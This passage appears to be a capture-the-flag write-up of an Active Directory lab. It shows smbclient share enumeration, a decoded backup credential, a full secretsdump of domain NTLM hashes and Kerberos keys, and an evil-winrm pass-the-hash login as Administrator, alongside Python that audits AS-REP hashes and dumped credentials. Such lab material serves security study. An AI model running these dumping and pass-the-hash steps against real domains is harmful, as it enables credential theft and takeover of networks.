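ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}
# hashcat -m 18200, the mode used on this page, verifies RC4-HMAC (etype 23) AS-REPs only.
HASHCAT_MODE_BY_ETYPE = {23: 18200}

# '$krb5asrep$<etype>$<user>@<REALM>:<checksum>$<edata>' as kerbrute/impacket emit it.
ASREP_RE = re.compile(r"^\$krb5asrep\$(\d+)\$([^@$]+)@([^:$]+):([0-9a-fA-F]+)\$([0-9a-fA-F]+)$")


def parse_asrep(line):
    """Split an AS-REP hash line into its fields and name the cracking mode that fits it."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line in the kerbrute/impacket layout")
    etype = int(m.group(1))
    return {
        "etype": etype,
        "etype_name": ETYPE_NAMES.get(etype, "unknown"),
        "user": m.group(2),
        "realm": m.group(3),
        "checksum": m.group(4).lower(),
        "edata": m.group(5).lower(),
        "hashcat_mode": HASHCAT_MODE_BY_ETYPE.get(etype),  # None: not a job for -m 18200
    }


def relabel_is_sound(original_line, edited_line):
    """True only if an edited hash line still carries the etype the KDC actually used."""
    return parse_asrep(original_line)["etype"] == parse_asrep(edited_line)["etype"]


# userAccountControl bits (the UF_* flags from MS-SAMR / MS-ADTS).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# LDAP filter for the same audit against a live DC; 1.2.840.113556.1.4.803 is the
# standard bitwise-AND matching rule (LDAP_MATCHING_RULE_BIT_AND).
PREAUTH_AUDIT_FILTER = "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

# Constructed sample of (sAMAccountName, userAccountControl); not the real values for this domain.
SAMPLE_ENTRIES = [
    ("svc-admin", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH),
    ("backup", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD),
    ("james", UF_NORMAL_ACCOUNT),
    ("old-svc", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH),  # flagged but disabled
]


def preauth_disabled(entries):
    """Enabled accounts whose AS-REP can be requested without pre-authentication."""
    return sorted(name for name, uac in entries
                  if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE)


if __name__ == "__main__":
    info = parse_asrep(ASREP_LINE)
    print(f"{info['user']}@{info['realm']}: etype {info['etype']} ({info['etype_name']}), "
          f"hashcat mode {info['hashcat_mode']}")
    relabelled = ASREP_LINE.replace("$18$", "$23$")
    print("relabelling the header to $23$ is sound:", relabel_is_sound(ASREP_LINE, relabelled))
    print("enabled accounts without pre-auth:", preauth_disabled(SAMPLE_ENTRIES))
```

The audit function is the check to run after clearing the flag: an account should drop out of the list, and the LDAP filter above returns the same set directly from the directory.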
Enumerate DC Pt. 3
Now we're told to enumerate SMB shares with our known account... We're going to use smbclient to poke around real quick:
# List shares
$ smbclient -U svc-admin -L ///10.10.204.111 1 ⨯
Enter WORKGROUP\svc-admin's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
# Poke at shares
┌──(kali㉿kali)-[~/tmp]
└─$ smbclient \\\\10.10.204.111\\ADMIN -U svc-admin 1 ⨯
Enter WORKGROUP\svc-admin's password:
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
┌──(kali㉿kali)-[~/tmp]
└─$ smbclient \\\\10.10.204.111\\backup -U svc-admin 1 ⨯
Enter WORKGROUP\svc-admin\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 15:08:39 2020
.. D 0 Sat Apr 4 15:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 3548545 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/tmp]
└─$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
┌──(kali㉿kali)-[~/tmp]
└─$ echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 --decode
backup@spookysec.local:backup2517860
Elevating Privileges
We're told to use secretsdump.py from Impacket to get password hashes using the credentials we found. Cool. (I hate these tutorial boxes, I'm never doing one again; I enjoy the exploration... this feels like cheating...) Anyway...
$ secretsdump.py backup:backup2517860@10.10.204.111
Impacket v0.9.23.dev1+20210302.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:e3d0f4e53b0fce2073a2ef33f2d075ca:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:6107bedbb5baabcc22813b5ffb187ca01abd47c01700016ec2b843a4c3994b54
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:cd0c0da9ee828cd342853de2a209d2f4
ATTACKTIVEDIREC$:des-cbc-md5:9426b6febf6dc2ab
[*] Cleaning up...
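secretsdump fell back to the DRSUAPI method here, i.e. it replicated the directory the way another domain controller would, which only works because the backup account holds the directory replication extended rights; that permission is the thing a defender would audit. The dump format itself (domain\user:rid:lmhash:nthash:::) is worth being able to read too, so as an added example, not from the original writeup, the following Python parses a subset of the lines above and runs the checks a password audit of an NTDS export would run: blank passwords (the NT hash of the empty string), LM hashes still being stored, and the same NT hash appearing under more than one account. On this data it finds that Guest has a blank password and that a-spooks shares the Administrator account's hash (the same hash the Looting section logs in with). The empty-LM and empty-NT constants are the well-known values, not anything specific to this box.

```python
import re
from collections import defaultdict

# Lines taken from the secretsdump output above (a subset), plus one Kerberos-key line
# and the section banner, to show that non-NTDS lines are ignored.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:e3d0f4e53b0fce2073a2ef33f2d075ca:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" : LM storage is off, as it should be
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" : the account has a blank password

# "[domain\]user:rid:lmhash:nthash:::" ; the optional domain prefix is how secretsdump
# prints accounts that live in the domain partition rather than the DC's own SAM.
DUMP_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_dump(text):
    """Return one record per NTDS credential line; every other line is skipped."""
    records = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["lm"] = rec["lm"].lower()
        rec["nt"] = rec["nt"].lower()
        records.append(rec)
    return records


def audit(records):
    """The checks a password audit of an NTDS export runs, without cracking anything."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    admin_nt = next((r["nt"] for r in records if r["rid"] == 500), None)
    return {
        "blank_password": sorted(r["user"] for r in records if r["nt"] == EMPTY_NT),
        "lm_hash_stored": sorted(r["user"] for r in records if r["lm"] != EMPTY_LM),
        "shared_nt": sorted(sorted(users) for users in by_nt.values() if len(users) > 1),
        "admin_password_reuse": sorted(u for u in by_nt.get(admin_nt, []) if u != "Administrator"),
    }


if __name__ == "__main__":
    for key, value in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

Comparing hashes rather than passwords is the point: the reuse between accounts is visible without ever recovering a plaintext, and the two findings on this data (a blank Guest password, an ordinary-looking account that is effectively a second Administrator) are both things a directory owner can fix directly.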
Looting
└─$ evil-winrm -u Administrator -i 10.10.204.111 -H 0e0363213e37b94221497260b0bcb4fc 1 ⨯
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 11:39 AM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
********
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ..\..\backup\Desktop
*Evil-WinRM* PS C:\Users\backup\Desktop> dir
Directory: C:\Users\backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 12:19 PM 26 PrivEsc.txt
*Evil-WinRM* PS C:\Users\backup\Desktop> type PrivEsc.txt
******
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> dir
Directory: C:\Users\svc-admin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 12:18 PM 28 user.txt.txt
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> type user.txt.txt
******
GGWP!